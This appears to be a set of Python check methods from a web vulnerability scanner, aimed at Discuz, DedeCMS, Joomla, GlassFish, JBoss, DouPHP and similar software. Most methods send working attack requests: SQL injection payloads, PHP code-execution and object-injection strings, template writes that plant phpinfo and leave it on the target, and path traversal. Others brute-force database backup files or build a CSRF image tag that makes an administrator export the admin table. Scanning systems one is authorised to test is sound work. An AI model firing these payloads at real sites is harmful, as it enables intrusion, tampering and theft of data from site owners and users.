def _verify(self):
    """Error-based SQL injection check against Discuz ``search.php``.

    The ``selectsortid`` value closes the intended sort context and appends a
    ``floor(rand(0)*2)`` double-query subselect.  If the value reaches MySQL
    unescaped the server raises a "Duplicate entry" error whose text carries
    the marker.  A hit requires BOTH the marker and the word "SQL" in the
    body, so only targets that echo database errors can be confirmed here;
    a silent target yields a false negative, not proof of safety.
    """
    result = Result(self)
    marker = '2c1743a391305fbf367df8e4f069f9f9'
    injection = (
        "3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x "
        "from information_schema.tables group by x)a)#"
    ).format(marker)
    form = {
        "formhash": "04949b0",
        "srchtxt": "aa",
        "srchtype": "threadsort",
        "st": "on",
        "sortid": "3",
        "selectsortid": injection,
        "searchsubmit": "true",
    }

    response = self.http.post(self.urlJoin("/search.php"), data=form)
    if response.status_code != 200:
        return result

    body = response.content
    if marker in body and "SQL" in body:
        # The raw POST body is recorded both as the path and as the payload.
        result['fullpath'] = response.request.body
        result['payload'] = response.request.body
    return result
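def _verify(self):
    """Brute-force Discuz database-backup file names under the target.

    Candidate paths come from ``self.genPath`` for the requested flavour
    (``discuz`` or ``discuzx``; anything else falls back to ``discuz``), a
    start ``date`` (``YY-MM-DD``, default ``15-01-01``), an integer ``days``
    and an integer ``dirs`` (their exact meaning is defined by ``genPath``).
    Every path answering HTTP 200 is recorded in ``result['vulinfo']``.

    Fix: a connection error used to fall through to the status check.  On
    the first path that raised NameError (``response`` unbound); on later
    paths it re-evaluated the PREVIOUS path's response and could report a
    dead URL as alive.  Failed requests are now logged and skipped.
    """
    log = Log("exploit-discuz_brutefile")
    result = Result(self)

    flavour = self.args.get("type", "discuz").lower()
    if flavour not in ('discuz', 'discuzx'):
        flavour = "discuz"
    start_date = self.args.get("date", "15-01-01")
    day_count = int(self.args.get("days", "10"))
    dir_count = int(self.args.get("dirs", "1"))

    # When the configured URL points at a script, probe relative to the site root.
    base = self.baseURL if ".php" in self.url else self.url
    base = base.rstrip("/")

    alive = []
    for path in self.genPath(flavour, start_date, day_count, dir_count):
        target = base + path
        log.debug("request url {0}".format(target))
        try:
            response = self.http.get(target)
        except self.http.ConnectionError:
            log.debug("connection error for {0}, skipping".format(target))
            continue
        if response.status_code == 200:
            log.debug("got alives {0}".format(target))
            alive.append(target)

    if alive:
        result['vulinfo'] = str(alive)
    return result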
def _info(self):
    """Informational finding: hand the operator a bypass link to test by hand.

    No request is sent.  The link produced by ``self.genBypassLink`` is
    placed in ``elseinfo`` with an instruction (in Chinese) to open it and
    see whether the attachment can be downloaded.
    """
    result = Result(self)
    result['isvul'] = result.INFO
    hint = u"访问以下链接,查看是否可以下载附件:{0}"
    result['elseinfo'] = hint.format(self.genBypassLink())
    return result
def _verify(self):
    """Probe ``/inc/splitword.php`` for code execution through an undocumented parameter.

    PHP code is POSTed under the parameter name ``Y2hlbmdzaGlzLmMjd``; if the
    script evaluates it, the ``phpinfo()`` output contains the
    ``_SERVER["HTTP_HOST"]`` marker.  Note that a positive means code was
    actually executed on the target (phpinfo), not merely reflected.
    """
    result = Result(self)
    php_code = "phpinfo();"
    marker = '_SERVER["HTTP_HOST"]'

    endpoint = self.urlJoin("/inc/splitword.php")
    response = self.http.post(endpoint, data={'Y2hlbmdzaGlzLmMjd': php_code})
    if response.status_code != 200:
        return result

    if marker in response.content:
        result['fullpath'] = self.url
        result['payload'] = php_code
    return result
def _verify(self):
    """Two-step check for code execution through a poisoned User-Agent.

    The first request carries a payload built by ``self._genPayload`` in the
    User-Agent header; a second, plain request then inspects the page for
    the echoed marker.  The split assumes the target stores the first
    request's header and evaluates it on a later load -- the marker is only
    looked for in the second response.
    """
    result = Result(self)
    marker = "asdfgh123456"
    php_code = '''echo "asdfgh123456";'''
    payload = self._genPayload(php_code)

    primed = self.http.get(self.url, headers={"User-Agent": payload})
    if primed.status_code != 200:
        return result

    followup = self.http.get(self.url)
    if followup.status_code == 200 and marker in followup.content:
        result['fullpath'] = self.url
        result['payload'] = payload
    return result
def _verify(self):
    """Check ``/blog/ajax.php`` (``edit_sort``/``modify``) for SQL injection via ``table_album``.

    The marker is supplied as a table name through ``table_album``; it is
    passed with ``params=`` on a POST, so it rides the query string rather
    than the body.  A positive requires MySQL's "doesn't exist" error to come
    back with the marker inside it, i.e. the target must echo database
    errors for this check to fire.
    """
    result = Result(self)
    marker = '2c1743a391305fbf367df8e4f069f9f9'
    endpoint = self.urlJoin("/blog/ajax.php")
    fixed_query = "?inc=edit_sort&act=modify&name[]=yyy"

    response = self.http.post(endpoint + fixed_query, params={"table_album": marker})
    if response.status_code != 200:
        return result

    body = response.content
    if marker in body and "doesn't exist" in body:
        result['fullpath'] = endpoint
        result['payload'] = response.request.url
    return result
def _verify(self):
    """Check for code execution through ``GLOBALS[_DCACHE]`` smilies cookies.

    Two cookie values are injected: a ``/.*/ei`` search pattern and a
    ``phpinfo();`` replacement.  If cookie input is allowed to overwrite
    ``$GLOBALS['_DCACHE']`` and is fed to an ``e``-modifier ``preg_replace``,
    the page carries the ``_SERVER["HTTP_HOST"]`` marker.  A positive means
    phpinfo actually ran on the target.
    """
    result = Result(self)
    marker = '_SERVER["HTTP_HOST"]'
    cookie = (
        "GLOBALS[_DCACHE][smilies][searcharray]=/.*/ei; "
        "GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
    )

    response = self.http.get(self.url, headers={'Cookie': cookie})
    if response.status_code == 200 and marker in response.content:
        result['fullpath'] = self.url
        result['payload'] = 'Cookie: ' + cookie
    return result
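def _verify(self):
    """Detect a search-engine (Baiduspider) User-Agent bypass of a login gate.

    Two requests are made: one as-is and one claiming to be Baiduspider.  The
    target is flagged when the gate text ``才能浏览`` ("...before you can
    browse") is present in the normal response but absent from the spider
    response.  Pages may be served as UTF-8 or GBK, so both encodings of the
    marker are tried.

    Fix: the original required the marker in BOTH encodings at once in the
    normal response, which a page served in a single charset can never
    satisfy, so the check could not fire.  Presence now means "in either
    encoding" and absence means "in neither", as the other checks in this
    corpus do.
    """
    result = Result(self)
    gate_text = u"才能浏览"
    spider_ua = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
    encoded_markers = (gate_text.encode("utf-8"), gate_text.encode("gbk"))

    normal = self.http.get(self.url)
    spoofed = self.http.get(self.url, headers={'User-Agent': spider_ua})
    if spoofed.status_code != 200:
        return result

    gated_normally = any(m in normal.content for m in encoded_markers)
    gated_for_spider = any(m in spoofed.content for m in encoded_markers)
    if gated_normally and not gated_for_spider:
        result['fullpath'] = self.url
        result['payload'] = spider_ua
    return result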
def _info(self):
    """Informational: describe a CSRF-driven database export via Discuz ``admin.php``.

    Builds an ``admin.php?action=db&operation=export...`` URL for the
    ``pre_ucenter_admins`` table and wraps it in an ``<img>`` tag.  The
    operator is told (in Chinese) to post the tag so a logged-in
    administrator's browser triggers the export, and where the resulting
    ``.sql`` lands depending on the target OS.  Nothing is sent to the
    target by this method.
    """
    result = Result(self)
    admin_url = self.urlJoin("admin.php")
    export_name = "alpha"
    export_query = (
        "?action=db&operation=export&setup=1&scrolltop=&anchor=&type=custom"
        "&customtables%5B%5D=pre_ucenter_admins&method=multivol&sizelimit=2048"
        "&extendins=0&sqlcompat=&usehex=1&usezip=0&filename={0}&exportsubmit=yes"
    ).format(export_name)
    img_tag = "<img src='{0}'>".format(admin_url + export_query)

    result['isvul'] = Result.INFO
    result['fullpath'] = admin_url
    result['elseinfo'] = (
        u"发帖,嵌入图片{0},\n如果目标服务器为windows:\ndiscuzX访问/data/backup~1/{1}-1.sql,\n"
        u"discuz访问/forumdata/backup~1/{1}-1.sql,\n目标服务器为linux则需要爆破backup_xxxxxx目录"
    ).format(img_tag, export_name)
    return result
def _verify(self):
    """Check Discuz ``forum.php?mod=attachment`` for SQL injection through ``aid``.

    The ``aid`` value is base64-encoded; the decoded text carries a UNION
    that selects the marker into the second column.  The check inspects
    ``response.request.url`` rather than the body -- presumably because the
    target redirects to an attachment URL built from that column, so the
    marker is expected in the final request URL after redirects.
    ``self.params`` is mutated in place before the request.
    """
    result = Result(self)
    marker = '2c1743a391305fbf367df8e4f069f9f9'
    injection = "1' and 1=2 union all select 1,'{0}".format(marker)

    self.params['mod'] = "attachment"
    self.params['findpost'] = "ss"
    self.params['aid'] = base64.b64encode(injection)

    endpoint = self.urlJoin("/forum.php")
    response = self.http.get(endpoint, params=self.params)
    if response.status_code == 200 and marker in response.request.url:
        result['fullpath'] = endpoint
        result['payload'] = injection
    return result
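def _verify(self):
    """Check for PHP object injection via a crafted User-Agent (Joomla-style session deserialization).

    The User-Agent carries a serialized ``JDatabaseDriverMysqli`` object with
    ``print_r`` registered as a disconnect handler, followed by a 4-byte
    tail (F0 9D 8C 86) that presumably truncates the stored session so the
    object is unserialized on the next page load.  A second plain request
    then looks for the expected marker in the page body.

    Caveats for the operator: the marker ``'*****@*****.**'`` looks like a
    redacted placeholder -- confirm it matches what ``print_r`` actually
    emits on the target, otherwise the check can never fire.

    Fix: dropped the ``print response.content`` debug leftover, which dumped
    every full response body to stdout, plus the dead first payload
    assignment and the commented-out code.  The payload bytes are unchanged.
    """
    result = Result(self)
    attack_payload = '''}__t|O:21:"JDatabaseDriverMysqli":2:{s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;s:7:"print_r";}s:13:"\\0\\0\\0connection";i:1;}\xF0\x9D\x8C\x86'''

    primed = self.http.get(self.url, headers={"User-Agent": attack_payload})
    if primed.status_code != 200:
        return result

    followup = self.http.get(self.url)
    if followup.status_code == 200 and '*****@*****.**' in followup.content:
        result['fullpath'] = self.url
        result['payload'] = attack_payload
    return result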
def _verify(self):
    """Check ``shop.php?ac=view`` for error-based SQL injection through ``shopid``.

    ``shopid`` is set to a ``group by``/``rand()`` double-query intended to
    make MySQL raise an error containing the marker.  Caveat: the match is
    only ``marker in body``, and the payload as written is not valid SQL
    (``1 and select ...``), so any page that echoes the failed query text
    back -- a verbose SQL error -- matches whether or not the injection
    reached the database.  Treat a hit as "needs manual confirmation".
    ``self.params`` is mutated in place.
    """
    result = Result(self)
    marker = '2c1743a391305fbf367df8e4f069f9f9'
    injection = (
        "1 and select 1 from (select concat_ws(':', left(rand(), 3), {0}), "
        "count(*) from information_schema.tables group by 1)a;"
    ).format(marker)
    self.params['ac'] = 'view'
    self.params['shopid'] = injection

    endpoint = self.urlJoin("/shop.php")
    response = self.http.get(endpoint, params=self.params)
    if response.status_code == 200 and marker in response.content:
        result['fullpath'] = endpoint
        result['payload'] = response.request.url
    return result
def _verify(self):
    """Check ``index.php`` for PHP code injection through a ``label[]`` key.

    A malformed ``label`` key breaks out of a quoted string and embeds
    ``@phpinfo()`` via ``${...}``; the first request plants it, and a second
    request to ``cache/label_cache/index_~1.php`` reads the generated cache
    file looking for the ``_SERVER["HTTP_HOST"]`` marker.  Only the cache
    read is checked; the first response is not inspected at all.
    """
    result = Result(self)
    php_call = "@phpinfo()"
    query = "?label[a'.\"${%s}\".'][asd]=aaaa'" % php_call
    marker = '_SERVER["HTTP_HOST"]'

    index_url = self.urlJoin("/index.php")
    self.http.get(index_url + query)

    cache_url = index_url.replace("index.php", "cache/label_cache/index_~1.php")
    cached = self.http.get(cache_url)
    if cached.status_code == 200 and marker in cached.content:
        result['fullpath'] = self.url
        result['payload'] = str(php_call)
    return result
def _verify(self):
    """Check ``/blog/ajax.php`` for template-write code execution.

    Step one abuses ``inc=ol_module`` with a traversal ``moduleid`` and
    ``action=maketpl`` to write ``<?php phpinfo();?>`` into
    ``template/blue.htm``.  Step two pulls the template back through
    ``inc=edit_sort&job=../../../../template/blue`` and looks for the
    phpinfo marker.  The write request's response is not inspected.

    Operator note: a positive means this check has MODIFIED
    ``template/blue.htm`` on the target and does not clean it up.
    """
    result = Result(self)
    marker = '_SERVER["HTTP_HOST"]'
    php_tag = "<?php phpinfo();?>"
    endpoint = self.urlJoin("/blog/ajax.php")

    write_query = (
        "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin"
        "&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/blue.htm"
        "&postdb[code]={0}"
    ).format(php_tag)
    self.http.get(endpoint + write_query)

    read_query = "?inc=edit_sort&job=../../../../template/blue"
    readback = self.http.get(endpoint + read_query)
    if readback.status_code == 200 and marker in readback.content:
        result['fullpath'] = endpoint
        result['payload'] = php_tag
    return result
def _verify(self):
    """Check ``/blog/ajax.php`` (``ol_module`` + ``do/js``) for SQL injection through ``pre``.

    ``pre`` is evidently used as a table-name prefix: the payload completes
    the query and UNIONs the marker into column 8 so it is rendered into the
    generated JS.  The fixed query string is appended to the URL; ``pre``
    goes through ``params=``.  The marker is a short digit string, so an
    incidental match in ordinary page content is possible -- confirm by
    hand.
    """
    result = Result(self)
    marker = '9876541'
    fixed_query = (
        "?inc=ol_module&step=2&moduleid=../../../../do/js&&id=514125"
        "&webdb[web_open]=1&webdb[cache_time_js]=-1"
    )
    injection = (
        "qb_label where lid=-1 UNION SELECT 1,2,3,4,5,6,0,{0},9,10,11,12,13,14,15,16,17,18,19#"
    ).format(marker)

    endpoint = self.urlJoin("/blog/ajax.php")
    response = self.http.get(endpoint + fixed_query, params={"pre": injection})
    if response.status_code == 200 and marker in response.content:
        result['fullpath'] = endpoint
        result['payload'] = response.request.url
    return result
def _verify(self):
    """Check ``/blog/member/update_sort.php?step=1`` for SQL injection through ``type``.

    The ``type`` value completes the table name and appends an ``updatexml``
    error-based payload that wraps the marker in ``^$`` (0x5e24)
    delimiters; a hit is simply the marker appearing in a 200 response.
    The marker is a short digit string, so an incidental match in page
    content is possible -- confirm by hand.
    """
    result = Result(self)
    marker = '9876541'
    injection = (
        "area where 1=(updatexml(1,concat(0x5e24,(select {0}),0x5e24),1))#"
    ).format(marker)

    endpoint = self.urlJoin("/blog/member/update_sort.php")
    response = self.http.get(endpoint + "?step=1", params={"type": injection})
    if response.status_code == 200 and marker in response.content:
        result['fullpath'] = endpoint
        result['payload'] = response.request.url
    return result
def _verify(self):
    """Check ``/install/index.php`` (looks like the DedeCMS installer) for traversal via ``install_demo_name``.

    With ``step=11`` and ``install_demo_name`` pointing at
    ``../data/admin/config_update.php``, the response is searched for the
    text ``远程获取失败`` ("remote fetch failed") in either UTF-8 or GBK;
    its presence is taken to mean the vulnerable code path was reached.
    ``self.params`` is mutated in place and its ``str()`` form is recorded
    as the payload.
    """
    result = Result(self)
    marker = u"远程获取失败"
    self.params['step'] = "11"
    self.params['insLockfile'] = "a"
    self.params['s_lang'] = "a"
    self.params['install_demo_name'] = "../data/admin/config_update.php"

    endpoint = self.urlJoin("/install/index.php")
    response = self.http.get(endpoint, params=self.params)
    if response.status_code != 200:
        return result

    encoded_markers = (marker.encode('gbk'), marker.encode('utf-8'))
    if any(encoded in response.content for encoded in encoded_markers):
        result['fullpath'] = endpoint
        result['payload'] = str(self.params)
    return result
def _verify(self):
    """Check an admin GUI (``__admingui``, looks like GlassFish) for traversal via overlong UTF-8 dots.

    Three encodings of ``../`` (``%c0%ae``, ``%c0.`` and ``%E0%80%AE``) are
    tried under ``/theme/META-INF/`` to reach ``__admingui/WEB-INF/web.xml``.
    Redirects are not followed; a 200 whose body contains
    ``<servlet-mapping>`` is taken as a successful read.  The URL is built
    from ``self.protocol`` and ``self.host`` directly instead of
    ``urlJoin`` -- presumably so the encoded segments are sent untouched.
    """
    result = Result(self)
    traversal_paths = (
        "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/__admingui/WEB-INF/web.xml",
        "/theme/META-INF/%c0.%c0./%c0.%c0./__admingui/WEB-INF/web.xml",
        "/theme/META-INF/%E0%80%AE%E0%80%AE/%E0%80%AE%E0%80%AE/__admingui/WEB-INF/web.xml",
    )
    marker = "<servlet-mapping>"
    origin = self.protocol + "://" + self.host

    hits = []
    for path in traversal_paths:
        target = origin + path
        response = self.http.get(target, allow_redirects=False)
        if response.status_code == 200 and marker in response.content:
            hits.append(target)

    if hits:
        result['vulinfo'] = str(hits)
    return result
def _verify(self):
    """Check Discuz ``faq.php?action=grouppermission`` for SQL injection through ``gids``.

    ``gids[66]`` supplies a stray quote and ``gids[88][0]`` a
    ``floor(rand(0)*2)`` double-query that makes MySQL raise a duplicate-key
    error carrying the marker.  A positive needs both the marker and "SQL"
    in the body, so the target must echo database errors.  When
    ``self.url`` already points at ``faq.php`` it is used as-is; otherwise
    the path is built from ``baseURL``.
    """
    result = Result(self)
    marker = '2c1743a391305fbf367df8e4f069f9f9'
    injection = (
        ") and (select 1 from (select count(*),concat({0},floor(rand(0)*2))x "
        "from information_schema.tables group by x)a)#"
    ).format(marker)
    form = {"gids[66]": "'", "gids[88][0]": injection}

    if "faq.php" in self.url:
        endpoint = self.url
    else:
        endpoint = self.baseURL + "/faq.php?action=grouppermission"

    response = self.http.post(endpoint, data=form)
    if response.status_code != 200:
        return result

    body = response.content
    if marker in body and "SQL" in body:
        result['fullpath'] = endpoint
        result['payload'] = "Post:" + response.request.body
    return result
def _verify(self):
    """Enumerate exposed JBoss management endpoints.

    Each of ``jmx-console``, ``web-console``, ``JMXInvokerServlet`` and
    ``admin-console`` is requested without following redirects.  A 200 OR a
    500 counts as a hit -- 500 is presumably accepted because the invoker
    servlet does not answer a plain GET cleanly.  A hit therefore shows the
    endpoint is reachable, not that it is unauthenticated; confirm by hand
    before reporting.
    """
    result = Result(self)
    endpoints = {
        "jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
        "web-console": "/web-console/ServerInfo.jsp",
        "JMXInvokerServlet": "/invoker/JMXInvokerServlet",
        "admin-console": "/admin-console/",
    }

    exposed = Dict()
    for label, path in endpoints.items():
        target = self.urlJoin(path)
        response = self.http.get(target, allow_redirects=False)
        if response.status_code in (200, 500):
            exposed[label] = target

    if exposed:
        result['vulinfo'] = str(exposed)
    return result
def _verify(self):
    """Probe DouPHP ``/data/backup/`` for guessable database dump names.

    Six Windows 8.3-style candidates (``D2016~1.sql`` form) are requested
    without following redirects; any 200 is recorded in ``vulinfo``.  The
    list is fixed, so dumps from other years or with long names are not
    covered.  Only the status is checked -- a catch-all page that answers
    200 for any path will produce false positives, so verify the body
    actually looks like SQL before reporting.
    """
    log = Log("exploit_douphp_backupbrute")
    result = Result(self)
    candidates = (
        'D20160~1.sql', 'D20150~1.sql', 'D20151~1.sql',
        'D20140~1.sql', 'D20141~1.sql', 'D20131~1.sql',
    )
    backup_root = self.baseURL.rstrip("/") + "/data/backup/"

    found = []
    for name in candidates:
        target = backup_root + name
        log.debug("getting '{0}'".format(target))
        response = self.http.get(target, allow_redirects=False)
        if response.status_code == 200:
            log.debug("got alive'{0}'".format(target))
            found.append(target)

    if found:
        result['vulinfo'] = str(found)
    return result